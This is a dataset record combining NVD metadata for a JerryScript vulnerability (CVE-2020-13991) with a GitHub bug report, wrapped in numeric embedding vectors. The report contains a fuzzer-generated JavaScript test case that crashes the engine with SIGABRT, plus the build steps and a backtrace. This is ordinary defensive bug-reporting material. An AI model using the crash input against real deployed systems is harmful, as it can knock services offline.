-0.018828164786100388, 0.0023646133486181498, 0.00019770590006373823, -0.0040008001960814, -0.00000890456522029126, -0.01271233893930912, -0.0025883179623633623, -0.006877530831843615, -0.0007603184203617275, -0.014198772609233856, 0.0328938253223896, -0.0004730613436549902, 0.003000600030645728, 0.024951385334134102, 0.017334334552288055, -0.015322842635214329, 0.00946584902703762, 0.007580074016004801, 0.02799820527434349, -0.0057608564384281635, -0.00865977257490158, 0.0005671189283020794, -0.006825764197856188, 0.0014864340191707015, -0.037745069712400436, 0.015352423302829266, -0.01831050030887127, -0.002782441908493638, 0.009843003936111927, 0.016594815999269485, -0.008408335968852043, 0.01282326690852642, -0.024049172177910805, 0.007428472395986319, 0.012845451943576336, 0.019582474604249, 0.019242295995354652, 0.0046811578795313835, -0.002969170454889536, 0.005771948955953121, 0.007043922320008278, 0.006714836228638887, 0.006163894198834896, 0.018384452909231186, -0.0073914965614676476, 0.004015590529888868, -0.015056615695357323, -0.006101035047322512, -0.014464999549090862, 0.017778046429157257, 0.018340080976486206, -0.003076400840654969, -0.023013845086097717, 0.013947336003184319, 0.019907861948013306, 0.006211963016539812, -0.01046419981867075, -0.02018888108432293, 0.01835487224161625, -0.0209283996373415, -0.007594864349812269, -0.010197972878813744, 0.0019504824886098504, -0.009754261001944542, 0.009347525425255299, -0.023708991706371307, 0.008253036998212337, 0.00516924075782299, 0.011211114004254341, 0.010308900848031044, 0.030852749943733215, 0.016949785873293877, 0.0009752412443049252, -0.015322842635214329, 0.009702494367957115, 0.025572581216692924, -0.0012775198556482792, -0.009525010362267494, -0.015234099701046944, 0.005775646772235632, 0.005646230652928352, 0.006807276047766209, 0.01853235624730587, 0.020736124366521835, 0.005993804894387722, -0.013082098215818405, -0.021209416911005974, 0.014376257546246052, 0.003198421560227871, 0.02119462750852108, 0.025912759825587273, -0.005213611759245396, -0.009584171697497368, -0.004389047622680664, -0.004614601377397776, -0.004603508394211531, 0.0030431223567575216, 0.010146206244826317, -0.011935843154788017, 0.021874984726309776, 0.02166791819036007, -0.002105781575664878, 0.014797783456742764, 0.010649079456925392, -0.006984760984778404, 0.0025753763038665056, 0.019508522003889084, 0.016668768599629402, 0.014117425307631493, 0.010301505215466022, -0.01057512778788805, -0.02036636509001255, 0.019523313269019127, 0.006958877667784691, 0.008615401573479176, 0.012216860428452492, -0.003545995568856597, -0.01839924231171608, 0.01569260284304619, 0.0005472443881444633, 0.02515845000743866, 0.006378354970365763, 0.008319593034684658, -0.009510220028460026, 0.0007413682178594172, 0.014272725209593773, 0.02677060291171074, -0.0003600535274017602, -0.0016306403558701277, -0.0015659324126318097, 0.01336311548948288, -0.012594015337526798, -0.012778895907104015, 0.02083965763449669, 0.003823315491899848, -0.015145357698202133, -0.0026918507646769285, -0.00456653255969286, 0.0016611454775556922, 0.009613752365112305, -0.004725528880953789, -0.004440814256668091, 0.02128336951136589, 0.017644932493567467, -0.018162596970796585, 0.0032335487194359303, -0.0009382652933709323, -0.007964624091982841, -0.0029229505453258753, -0.0008680109167471528, 0.006433818954974413, 0.0023036031052470207, -0.011773149482905865, 0.01853235624730587, -0.013562786392867565, 0.007986810058355331, -0.016254637390375137, -0.003505322150886059, 0.004074751865118742, 0.0044519067741930485, -0.0038344082422554493, -0.022274324670433998, -0.020218461751937866, 0.020070556551218033, -0.014509371481835842, 0.006995853502303362, -0.025306355208158493, -0.0021760358940809965, -0.018325291574001312, 0.008615401573479176, 0.012660572305321693, 0.005028732120990753, -0.0029617752879858017, 0.0013126470148563385, -0.021076302975416183, 0.0021205719094723463, 0.015796134248375893, 0.015559488907456398, 0.007446960546076298, 0.004670065362006426, -0.004684855695813894, 0.0023498230148106813, -0.023294862359762192, 0.005198821425437927, 0.0129267992451787, 0.005217309575527906, 0.004666367545723915, 0.008371359668672085, -0.00158904236741364, 0.00959156733006239, 0.0115808742120862, 0.014842154458165169, 0.010641684755682945, -0.018680261448025703, -0.0060455710627138615, 0.006907111499458551, 0.004658972378820181, -0.012771500274538994, -0.005723880138248205, -0.013503625057637691, -0.006126918364316225, 0.0002081053826259449, -0.014679460786283016, -0.0009068357176147401, -0.012113328091800213, 0.024448512122035027, 0.0008157823467627168, 0.007491331547498703, 0.021653128787875175, 0.01294898521155119, 0.012786290608346462, -0.010020487941801548, -0.016210265457630157, 0.010700846090912819, -0.014346676878631115, -0.0033001054544001818, -0.0056647188030183315, -0.014612903818488121, -0.04102853685617447, -0.006078849546611309, 0.005498326849192381, -0.007757558953016996, -0.0046441820450127125, 0.006367261987179518, 0.00024427249445579946, -0.01905002072453499, 0.004829061683267355, 0.0064190286211669445, 0.00959156733006239, 0.012150304391980171, -0.0043187933042645454, 0.003497926751151681, 0.0021279670763760805, 0.013947336003184319, 0.018561936914920807, -0.006197172682732344, 0.011174138635396957, -0.0082234563305974, 0.012483087368309498, 0.014228353276848793, -0.01246829703450203, -0.013185631483793259, 0.009155250154435635, -0.03457992896437645, -0.018946487456560135, 0.013873384334146976, 0.016890622675418854, 0.02236306667327881, 0.013444462791085243, -0.012216860428452492, -0.0005296808085404336, -0.013533205725252628, 0.023753363639116287, 0.0038491985760629177, 0.0019467849051579833, -0.012505273334681988, 0.01484955009073019, -0.011218509636819363, -0.0026031082961708307, -0.004048869013786316, 0.05590766668319702, -0.003908359911292791, 0.028752515092492104, -0.0019209017045795918, 0.001286763814277947, -0.0005490931798703969, -0.0052542854100465775, -0.007509819697588682, 0.004477790091186762, 0.002967321779578924, -0.005764553789049387, 0.001262729405425489, 0.017245592549443245, -0.008482287637889385, -0.0028656376525759697, -0.0006993080605752766, 0.004156099166721106, -0.007055015303194523, 0.0005578749696724117, -0.016890622675418854, -0.02285115048289299, 0.009317944757640362, 0.03283466398715973, -0.015137962996959686, -0.0037197826895862818, -0.006422725971788168, 0.01674271933734417, -0.012157699093222618, 0.011839705519378185, -0.007565283682197332, 0.030379457399249077, -0.008393545635044575, -0.01157347857952118, -0.004518463741987944, 0.007912857457995415, 0.02202288806438446, -0.0015566883375868201, 0.017082897946238518, 0.001496602431870997, -0.0012802929850295186, -0.0046811578795313835, 0.007550493348389864, -0.025040127336978912, 0.004300305619835854, 0.004059961531311274, 0.004440814256668091, -0.011166743002831936, 0.004570229910314083, 0.013000751845538616, 0.014672065153717995, 0.005065707955509424, 0.0047662025317549706, -0.008741119876503944, 0.016506073996424675, -0.009428872726857662, 0.017038527876138687, 0.011773149482905865, -0.017068108543753624, -0.01638774946331978, -0.0160032007843256, -0.011677011847496033, -0.009081298485398293, -0.00819387473165989, -0.015071406029164791, -0.021564386785030365, 0.0033167446963489056, 0.014864340424537659, 0.024714738130569458, -0.009946536272764206, 0.03330795466899872, 0.0035866692196577787, 0.005697997286915779, -0.01971558853983879, -0.0008421277161687613, -0.0016204719431698322, -0.010752612724900246, 0.017778046429157257, 0.007180733606219292, 0.011388598941266537, 0.00944366306066513, -0.0014309700345620513, -0.007602259516716003, 0.018384452909231186, -0.0057016946375370026, -0.007273173425346613, -0.007191826589405537, -0.011329437606036663, 0.0012405437882989645, -0.020070556551218033, 0.009598962031304836, 0.02041073516011238, -0.0004552666505333036, -0.01338530145585537, -0.010730426758527756, 0.018044274300336838, -0.0020946888253092766, 0.0001696272665867582, -0.010286714881658554, -0.00009729302109917626, 0.005257983226329088, 0.01770409569144249, 0.013592367060482502, -0.018828164786100388, 0.010878331027925014, 0.024344978854060173, 0.00876330491155386, 0.011543897911906242, -0.014243143610656261, 0.0008999027195386589, 0.005424375180155039, 0.02171229012310505, -0.011921052820980549, -0.015130567364394665, 0.01375506166368723, 0.02332444302737713, 0.0070772008039057255, -0.005620347801595926, 0.002041073516011238, 0.018177388235926628, 0.004145006183534861, -0.01643212139606476, -0.014723831787705421, 0.03753800690174103, 0.01897606812417507, 0.012431321665644646, -0.008733724243938923, -0.007668816484510899, 0.017171641811728477, 0.0037419681902974844, 0.0016546746483072639, -0.01340748742222786, -0.012549644336104393, 0.017068108543753624, 0.009451057761907578, -0.019656425341963768, 0.01201719045639038, -0.010545547120273113, 0.025276774540543556, 0.021593967452645302, -0.0034720436669886112, -0.004773597698658705, 0.03937201574444771, -0.008171689696609974, 0.006578025408089161, -0.015973620116710663, 0.025454258546233177, -0.011344227939844131, 0.01831050030887127, -0.022703247144818306, -0.0057016946375370026, 0.004078449681401253, 0.026045873761177063, 0.014509371481835842, 0.005354120396077633, -0.002653026022017002, -0.005993804894387722, 0.000352889415808022, 0.015618650242686272, 0.0036162498872727156, -0.012046771124005318, 0.00478469068184495, 0.0015936644049361348, 0.005583371501415968, 0.011004049330949783, 0.005757158622145653, 0.0015659324126318097, 0.0014300456969067454, -0.00359776197001338, 0.015056615695357323, 0.000477914436487481, -0.03277549892663956, 0.0014180284924805164, 0.0001833777059800923, -0.008881628513336182, 0.014746016822755337, 0.013303954154253006, 0.014538952149450779, -0.002057712757959962, 0.008082947693765163, 0.005453955847769976, 0.014768202789127827, -0.00373457302339375, -0.015337632969021797, 0.01752660982310772, 0.04664888605475426, 0.00045965754543431103, -0.008600611239671707, -0.003878779476508498, 0.018133016303181648, -0.008563634939491749, -0.0006748114828951657, -0.02262929454445839, 0.001339454553090036, -0.004063659347593784, -0.007683606818318367, 0.010478990152478218, 0.007639235816895962, 0.005261680576950312, 0.015707392245531082, -0.004377955105155706, 0.006533653941005468, -0.02842712588608265, -0.008408335968852043, 0.013880779966711998 ]
237
CVE-2020-13991
2020-09-24T23:15:13.540000
vm/opcodes.c in JerryScript 2.2.0 allows attackers to hijack the flow of control by controlling a register.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/googleprojectzero/fuzzilli#JerryScript" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3858" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3859" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3860" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/pull/3867" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "88EBD351-0E34-480A-906A-603AC3920FBF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/jerryscript-project/jerryscript/issues/3860
[ "Exploit", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision c09c2c5dd7144d97b8b32cc2697d5b04bb647e35 ###### Build platform Ubuntu 18.04 LTS ###### Build steps python tools/build.py --profile=es2015-subset --lto=off --error-messages=on --strip=off --compile-flag=-fsanitize=address ###### Test case ``` function main() { const v4 = [13.37,13.37]; const v6 = [1337,1337]; const v7 = [2147483649,13.37,"species"]; const v8 = {a:13.37,length:13.37}; const v9 = {constructor:v7}; let v10 = v6; const v12 = {}; const v13 = [v12,v12,v12,v12]; const v14 = gc(); const v15 = "species".__proto__; let v18 = 0; while (v18 < 4) { const v19 = v18 + 1; v18 = v19; } const v22 = gc(); const v23 = "species".length; const v24 = [13.37,13.37]; const v26 = [1337,1337]; const v27 = [2147483649,13.37,"species"]; const v28 = {a:13.37,length:13.37}; const v29 = {constructor:v27}; const v33 = [13.37,13.37]; const v36 = {get:gc,set:gc}; const v38 = Object.defineProperty(v9,"e",v36); const v39 = !v8; const v40 = [0,v33,"species"]; const v45 = [2147483649,13.37,"species"]; const v46 = {constructor:v45}; const v48 = [1337,1337]; const v51 = Object(); let v52 = 0; const v53 = Object(); const v54 = v52 + 1; const v55 = [1337,1337]; const v56 = [2147483649,1337,"species"]; const v57 = {a:13.37,length:13.37}; const v58 = {constructor:v56}; const v61 = [1337,1337]; let v62 = v61; const v66 = [1337,1337]; const v67 = [2147483649,"species","species"]; const v69 = v66 % v66; const v70 = [1337,1337]; const v71 = !v46; let v74 = 0; do { let v75 = 13.37; try { const v76 = Object(...1,v38); } catch(v77) { const v78 = typeof v56; const v80 = v78 === "number"; let v81 = v80; } } while (v74 < 9); } main(); ``` ###### Execution steps build/bin/jerry testcase.js ###### Output Program received signal SIGABRT, Aborted. ###### Backtrace Program received signal SIGABRT, Aborted. __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:51 (gdb) bt ``` #0 __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:51 #1 0x00007ffff6e43801 in __GI_abort () at abort.c:79 #2 0x00000000005ac952 in jerry_port_fatal () #3 0x000000000053beef in jerry_fatal () #4 0x00000000004f90d3 in ecma_ref_object () #5 0x00000000005042cd in ecma_copy_value () #6 0x000000000055cf7c in vm_loop () #7 0x000000000055b5f6 in vm_execute () #8 0x000000000055b193 in vm_run () #9 0x000000000051f650 in ecma_op_function_call_simple () #10 0x000000000051f2d6 in ecma_op_function_call () #11 0x000000000055b9aa in vm_execute () #12 0x000000000055b193 in vm_run () #13 0x00000000004f501e in jerry_run () #14 0x00000000004f25df in main () ```
SIGABRT in jerry_port_fatal
https://api.github.com/repos/jerryscript-project/jerryscript/issues/3860/comments
3
2020-06-05T03:46:21
2020-06-06T16:39:41Z
https://github.com/jerryscript-project/jerryscript/issues/3860
631,289,340
3,860
true
This is a GitHub Issue repo:jerryscript owner:jerryscript-project Title : SIGABRT in jerry_port_fatal Issue date: --- start body --- ###### JerryScript revision c09c2c5dd7144d97b8b32cc2697d5b04bb647e35 ###### Build platform Ubuntu 18.04 LTS ###### Build steps python tools/build.py --profile=es2015-subset --lto=off --error-messages=on --strip=off --compile-flag=-fsanitize=address ###### Test case ``` function main() { const v4 = [13.37,13.37]; const v6 = [1337,1337]; const v7 = [2147483649,13.37,"species"]; const v8 = {a:13.37,length:13.37}; const v9 = {constructor:v7}; let v10 = v6; const v12 = {}; const v13 = [v12,v12,v12,v12]; const v14 = gc(); const v15 = "species".__proto__; let v18 = 0; while (v18 < 4) { const v19 = v18 + 1; v18 = v19; } const v22 = gc(); const v23 = "species".length; const v24 = [13.37,13.37]; const v26 = [1337,1337]; const v27 = [2147483649,13.37,"species"]; const v28 = {a:13.37,length:13.37}; const v29 = {constructor:v27}; const v33 = [13.37,13.37]; const v36 = {get:gc,set:gc}; const v38 = Object.defineProperty(v9,"e",v36); const v39 = !v8; const v40 = [0,v33,"species"]; const v45 = [2147483649,13.37,"species"]; const v46 = {constructor:v45}; const v48 = [1337,1337]; const v51 = Object(); let v52 = 0; const v53 = Object(); const v54 = v52 + 1; const v55 = [1337,1337]; const v56 = [2147483649,1337,"species"]; const v57 = {a:13.37,length:13.37}; const v58 = {constructor:v56}; const v61 = [1337,1337]; let v62 = v61; const v66 = [1337,1337]; const v67 = [2147483649,"species","species"]; const v69 = v66 % v66; const v70 = [1337,1337]; const v71 = !v46; let v74 = 0; do { let v75 = 13.37; try { const v76 = Object(...1,v38); } catch(v77) { const v78 = typeof v56; const v80 = v78 === "number"; let v81 = v80; } } while (v74 < 9); } main(); ``` ###### Execution steps build/bin/jerry testcase.js ###### Output Program received signal SIGABRT, Aborted. ###### Backtrace Program received signal SIGABRT, Aborted. __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:51 (gdb) bt ``` #0 __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:51 #1 0x00007ffff6e43801 in __GI_abort () at abort.c:79 #2 0x00000000005ac952 in jerry_port_fatal () #3 0x000000000053beef in jerry_fatal () #4 0x00000000004f90d3 in ecma_ref_object () #5 0x00000000005042cd in ecma_copy_value () #6 0x000000000055cf7c in vm_loop () #7 0x000000000055b5f6 in vm_execute () #8 0x000000000055b193 in vm_run () #9 0x000000000051f650 in ecma_op_function_call_simple () #10 0x000000000051f2d6 in ecma_op_function_call () #11 0x000000000055b9aa in vm_execute () #12 0x000000000055b193 in vm_run () #13 0x00000000004f501e in jerry_run () #14 0x00000000004f25df in main () ``` --- end body ---
2,895
[ -0.0019018701277673244, -0.003912418615072966, -0.005872250068932772, 0.0056657614186406136, 0.008976826444268227, 0.005379575304687023, -0.01718566007912159, 0.04126876965165138, -0.05306398496031761, 0.01396153774112463, -0.039529915899038315, 0.01854776218533516, 0.010447606444358826, -0.002227904973551631, 0.02159075438976288, -0.0076726870611310005, -0.04152959585189819, 0.00039033617940731347, -0.02630014531314373, -0.022663045674562454, 0.01985190063714981, -0.004865164868533611, -0.014867190271615982, 0.05326685309410095, -0.010520058684051037, 0.002936125034466386, 0.003414309583604336, -0.012954452075064182, 0.005437537096440792, -0.015953972935676575, -0.012621171772480011, -0.004618827253580093, -0.032661449164152145, 0.01650460995733738, 0.051672905683517456, 0.016330724582076073, 0.01975046843290329, 0.030951576307415962, -0.010679453611373901, -0.014468703418970108, -0.015461297705769539, -0.019098397344350815, -0.027213044464588165, 0.022880403324961662, -0.0005560705903917551, 0.05830952525138855, 0.026271164417266846, 0.00032490279409103096, -0.028256354853510857, 0.021286454051733017, 0.011244580149650574, -0.003171594813466072, 0.029517022892832756, -0.04237004369497299, 0.025271324440836906, -0.0157221257686615, 0.019895372912287712, 0.006227266043424606, 0.010911299847066402, 0.019315754994750023, -0.002041340572759509, -0.021808110177516937, -0.005676629487425089, 0.016171328723430634, 0.01886655017733574, 0.06729359924793243, -0.012027064338326454, -0.002014170866459608, 0.002910766750574112, -0.0050136917270720005, 0.0026589955668896437, -0.029734380543231964, 0.03877641260623932, 0.04390602931380272, 0.011853178963065147, -0.008005967363715172, 0.020866231992840767, 0.051209211349487305, -0.02361941523849964, -0.017692824825644493, -0.006846732459962368, 0.01744648814201355, -0.018881041556596756, 0.025169892236590385, -0.007346652448177338, -0.007002504542469978, -0.025082949548959732, -0.07790059596300125, -0.01003462914377451, -0.008266795426607132, -0.014910661615431309, 0.041471634060144424, -0.0036044965963810682, 0.023807790130376816, 0.0016745512839406729, 0.019040435552597046, -0.019576583057641983, 0.003468648763373494, -0.04292067885398865, -0.011280806735157967, 0.014287572354078293, 0.017591392621397972, -0.019880881533026695, 0.022083427757024765, -0.0108460932970047, 0.011172127909958363, 0.008389963768422604, -0.0018583987839519978, 0.040254440158605576, 0.11940121650695801, -0.010563530027866364, -0.009752064943313599, -0.052368443459272385, -0.054657936096191406, -0.017431996762752533, -0.011360503733158112, 0.008092910051345825, -0.015388845466077328, -0.020503969863057137, 0.015838049352169037, -0.02922721393406391, 0.009397049434483051, -0.03831271827220917, -0.023025307804346085, -0.028256354853510857, 0.0048905229195952415, 0.027546323835849762, 0.007665441837161779, 0.005289010237902403, -0.03127036616206169, -0.05500570684671402, -0.040312401950359344, 0.0191273782402277, -0.03608119115233421, 0.013237015344202518, -0.04187736660242081, -0.030227055773139, 0.022402217611670494, -0.014678814448416233, -0.05222354084253311, -0.03179202228784561, -0.020359065383672714, 0.03367577865719795, -0.00669095991179347, -0.0042275856249034405, -0.020417027175426483, -0.017750786617398262, 0.007190880365669727, -0.002291300566866994, -0.006919184233993292, -0.030690748244524002, 0.004397848155349493, -0.0009681424126029015, 0.015693144872784615, 0.019417187198996544, 0.003926909063011408, -0.008962335996329784, 0.02608278952538967, 0.012650152668356895, -0.011766236275434494, -0.03469011187553406, -0.03248756378889084, -0.00976655539125204, -0.015997443348169327, -0.029850304126739502, 0.013403655961155891, -0.007353897672146559, 0.010498322546482086, 0.0048905229195952415, 0.00020909249724354595, -0.04300762340426445, -0.0024054127279669046, 0.01818550005555153, 0.03709552437067032, -0.024010656401515007, -0.01039688941091299, -0.0011221033055335283, 0.06648213416337967, -0.004300037864595652, -0.03500889986753464, 0.017794258892536163, -0.00542304664850235, -0.021489320322871208, 0.010288211517035961, 0.0038254756946116686, -0.032661449164152145, 0.025532152503728867, -0.04457258805632591, 0.031878966838121414, -0.0038182304706424475, 0.02734345756471157, 0.005741836503148079, -0.011266316287219524, 0.0007535028271377087, 0.027952056378126144, 0.013229770585894585, -0.006614885292947292, -0.044514626264572144, -0.008571094833314419, -0.006223643198609352, 0.0434713177382946, -0.007962496019899845, -0.019895372912287712, -0.02367737703025341, -0.003533855779096484, -0.03060380555689335, 0.0004387885855976492, -0.0010831602849066257, 0.03205284848809242, -0.011317032389342785, 0.00008354643796337768, -0.012244421057403088, 0.004684034269303083, -0.04164551943540573, -0.008339247666299343, -0.003988493233919144, 0.023648396134376526, 0.005531725008040667, -0.02347451075911522, -0.010136062279343605, 0.038631509989500046, 0.011012732982635498, -0.02241670899093151, 0.010766396299004555, -0.0450652651488781, -0.019344735890626907, -0.026053808629512787, 0.005951947532594204, -0.04781844839453697, 0.02064887434244156, 0.02577849105000496, -0.008426190353929996, -0.010512812994420528, 0.00272420234978199, 0.01656257174909115, 0.01230962760746479, -0.018895531073212624, -0.009114486165344715, 0.0052020675502717495, 0.012454532086849213, 0.007158276624977589, -0.0057128556072711945, -0.0579327754676342, -0.05138309672474861, 0.013092110864818096, 0.015896011143922806, -0.046543288975954056, -0.02361941523849964, -0.02838676981627941, -0.0017216452397406101, -0.031299348920583725, -0.025068458169698715, -0.011758990585803986, -0.03599425032734871, -0.012584946118295193, 0.001162857748568058, -0.004484790842980146, 0.03280635178089142, -0.008071173913776875, 0.02473517879843712, 0.013780406676232815, 0.02619871310889721, -0.042138196527957916, 0.0007856534793972969, 0.02283693104982376, 0.021967504173517227, -0.03970380127429962, 0.01466432400047779, 0.0011818764032796025, -0.019040435552597046, 0.03390762582421303, -0.04703596234321594, -0.03048788197338581, -0.0050680311396718025, -0.008658037520945072, 0.016736457124352455, -0.004973843228071928, 0.012273401953279972, -0.0021156040020287037, 0.01634521409869194, 0.010237494483590126, 0.014033989980816841, 0.023793300613760948, 0.014736776240170002, 0.023909224197268486, 0.008339247666299343, 0.048224180936813354, -0.019301263615489006, 0.006694582756608725, -0.03416845574975014, -0.009483992122113705, -0.02075030840933323, 0.0024561292957514524, 0.0033346121199429035, 0.012642907910048962, -0.01236758939921856, -0.004745618440210819, -0.0217356588691473, 0.002021416090428829, 0.003544723615050316, 0.005999041721224785, -0.026329126209020615, -0.007219861261546612, 0.008665282279253006, -0.02938660979270935, -0.007190880365669727, 0.011889404617249966, 0.007379255723208189, 0.027778171002864838, -0.022039957344532013, 0.04344233497977257, -0.038950297981500626, 0.00577443977817893, -0.022083427757024765, -0.015910502523183823, 0.013838368467986584, 0.029517022892832756, -0.013396410271525383, -0.03373374044895172, -0.010875074192881584, -0.038486603647470474, -0.04379010573029518, -0.05619392171502113, 0.004234830848872662, 0.06555474549531937, -0.01173725537955761, -0.02241670899093151, 0.04074711352586746, -0.04726780951023102, -0.0016328912461176515, 0.03532768785953522, -0.0390952043235302, -0.04196431115269661, 0.0009781046537682414, -0.04584774747490883, -0.021822599694132805, -0.052194561809301376, 0.05002099275588989, 0.03729838877916336, -0.006853977683931589, -0.01634521409869194, -0.0006846731994301081, -0.010078100487589836, -0.009382558986544609, -0.00007103710959199816, -0.013845614157617092, -0.010693944059312344, 0.025807471945881844, 0.021445849910378456, 0.01754792034626007, 0.0008952374337241054, 0.01712769828736782, -0.0015477599808946252, -0.003905173158273101, 0.0570053867995739, -0.04410889372229576, -0.03755921870470047, -0.04045730456709862, 0.023604923859238625, -0.01624378189444542, 0.006201907526701689, -0.0263581071048975, 0.006890203338116407, 0.008947845548391342, 0.0030248791445046663, 0.0012724415864795446, 0.023648396134376526, -0.011454692110419273, -0.044456664472818375, 0.0017642108723521233, -0.02866208739578724, 0.013374675065279007, -0.010012893006205559, -0.000843162415549159, -0.026705877855420113, -0.04190634936094284, 0.0020612648222595453, -0.011925631202757359, -0.022300785407423973, 0.005890363361686468, -0.007832081988453865, -0.027256514877080917, -0.000251771358307451, -0.039674822241067886, 0.024662725627422333, 0.019605563953518867, -0.027850622311234474, 0.04352927580475807, -0.004126152489334345, -0.0038508339785039425, 0.002032283926382661, 0.031212404370307922, -0.04477545619010925, -0.016316233202815056, 0.004959352780133486, 0.03944297507405281, 0.0049376171082258224, -0.03141527250409126, 0.00812189094722271, -0.037646159529685974, -0.012193704023957253, -0.015026585198938847, 0.005810665898025036, 0.0035555914510041475, -0.015997443348169327, 0.010078100487589836, -0.014997604303061962, -0.03150221332907677, 0.01448319386690855, 0.024271484464406967, 0.05546939745545387, -0.03205284848809242, 0.0038761922623962164, 0.038486603647470474, 0.031299348920583725, 0.006850354839116335, 0.01844632811844349, -0.03358883783221245, -0.043094564229249954, 0.0029469928704202175, -0.03387864679098129, 0.006911939010024071, 0.03060380555689335, 0.003988493233919144, 0.0031860852614045143, 0.0035157427191734314, -0.016577061265707016, 0.015171489678323269, -0.011643067002296448, -0.023952694609761238, -0.03738533332943916, -0.00005801835868624039, 0.019924353808164597, 0.05468691512942314, 0.021706677973270416, -0.03205284848809242, -0.023460019379854202, -0.009042033925652504, -0.03100953809916973, -0.020837251096963882, 0.017258113250136375, 0.028314316645264626, -0.024793140590190887, -0.028357788920402527, 0.005281765013933182, -0.0052781421691179276, -0.045702844858169556, 0.0011891216272488236, 0.009114486165344715, 0.00485791964456439, 0.014106442220509052, 0.0050897663459181786, 0.01686687022447586, 0.011621331796050072, 0.025836452841758728, -0.0014934208011254668, -0.03929806873202324, 0.010498322546482086, -0.008889883756637573, 0.009389804676175117, 0.015330883674323559, -0.02319919317960739, 0.011186618357896805, -0.0003239971410948783, -0.02540173940360546, 0.04831112176179886, 0.019793938845396042, -0.006814128719270229, -0.003908795770257711, -0.032516542822122574, 0.010150551795959473, -0.011824198067188263, 0.01696830429136753, 0.03695061802864075, -0.0322846956551075, -0.015910502523183823, -0.011447446420788765, 0.002582920715212822, -0.0012805925216525793, -0.03555953502655029, 0.0004641468694899231, -0.01351233385503292, -0.02027212455868721, 0.042051251977682114, 0.01624378189444542, 0.0022695648949593306, 0.02493804506957531, 0.010411379858851433, -0.002557562431320548, 0.01995333470404148, 0.00237643183209002, -0.004176869057118893, -0.03225571662187576, -0.03802290931344032, 0.008455171249806881, -0.019402697682380676, -0.02714059129357338, -0.028212884441018105, 0.02608278952538967, 0.02996622771024704, 0.008484152145683765, -0.07117703557014465, 0.043297432363033295, 0.022039957344532013, 0.02772020921111107, -0.02519887313246727, -0.030516862869262695, 0.06480123847723007, -0.014526664279401302, -0.013947047293186188, 0.01079537719488144, -0.04799233376979828, 0.0002558467967901379, -0.027691228315234184, -0.02445986121892929, -0.011512653902173042, 0.0025485057849437, -0.012447286397218704, 0.03211081027984619, 0.033183105289936066, -0.01498311385512352, -0.030198074877262115, -0.01990986242890358, 0.031038518995046616, 0.02347451075911522, -0.0037023071199655533, 0.0028636730276048183, -0.013664484024047852, -0.007650951389223337, -0.021648716181516647, -0.016055405139923096, 0.030690748244524002, -0.025503171607851982, 0.050629593431949615, -0.009614406153559685, -0.025966865941882133, -0.004234830848872662, 0.041674502193927765, 0.013838368467986584, -0.020924193784594536, 0.008375473320484161, 0.05738213658332825, 0.004741996061056852, 0.015417826361954212, -0.00031380855944007635, 0.02305428870022297, -0.015519259497523308, 0.005455649923533201, 0.0064337546937167645, 0.026517502963542938, -0.004223962780088186, -0.03080667182803154, -0.009397049434483051, -0.0024832990020513535, -0.012954452075064182, -0.028937406837940216, -0.01875062845647335, 0.019837411120533943, -0.00134942214936018, 0.0019163604592904449, -0.0072053708136081696, 0.004412338603287935, 0.007143786177039146, 0.01453390996903181, -0.04208023473620415, -0.014077461324632168, 0.0072053708136081696, 0.03393660858273506, -0.032458581030368805, 0.020141709595918655, 0.008795696310698986, -0.01079537719488144, -0.010563530027866364, -0.04552895948290825, -0.02201097644865513, 0.0047927126288414, -0.03373374044895172, -0.007045975886285305, -0.004633317701518536, -0.02645954117178917, 0.03184998407959938, -0.019460659474134445, -0.018996965140104294, 0.0238802433013916, -0.02503947727382183, -0.03996463119983673, 0.015736617147922516, -0.013215280137956142, 0.0063649252988398075, -0.029531514272093773, -0.015316393226385117, -0.00703510781750083, -0.014287572354078293, 0.00031765757012180984, 0.02461925521492958, -0.03190794587135315, -0.001036972040310502, 0.010831602849066257, 0.04448564723134041, -0.033299028873443604, 0.029169252142310143, 0.004915881436318159, -0.005893985740840435, -0.033704761415719986, -0.02357594296336174, 0.03593628853559494, 0.016156839206814766, -0.008940600790083408, 0.0029886530246585608, 0.0315311960875988, 0.002977785188704729, 0.026271164417266846, 0.03274838998913765, -0.006919184233993292, -0.0203880462795496, -0.007372010499238968, -0.00862181093543768, 